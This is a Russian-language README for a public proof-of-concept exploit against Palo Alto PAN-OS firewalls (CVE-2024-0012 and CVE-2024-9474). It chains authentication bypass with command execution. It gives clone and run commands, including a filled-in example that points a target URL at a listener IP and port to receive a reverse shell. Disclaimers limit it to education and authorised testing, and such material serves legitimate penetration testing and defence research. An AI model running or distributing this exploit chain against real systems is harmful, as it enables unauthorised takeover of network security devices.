
Этот PoC нацелен на уязвимости в Palo Alto PAN-OS, в частности CVE-2024-0012 и CVE-2024-9474. Этот скрипт автоматизирует процесс эксплуатации, включая создание полезной нагрузки, фрагментированную доставку и бесшовное выполнение команд.
Этот скрипт Proof-of-Concept (PoC) направлен на эксплуатацию уязвимостей в Palo Alto PAN-OS, а именно CVE-2024-0012 и CVE-2024-9474, автоматизируя процесс эксплуатации, включая обход аутентификации, создание полезной нагрузки, чанковую доставку и выполнение команд.
⚠️ Этот скрипт предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование незаконно.
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: Целевой URL, включая http или https.<LISTENER_IP>: Ваш IP-адрес для слушателя обратной оболочки.<LISTENER_PORT>: Порт для слушателя обратной оболочки.python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
Получите полный разбор и технические детали этого PoC из этой статьи на Medium!
Этот PoC предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование этого инструмента строго запрещено. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.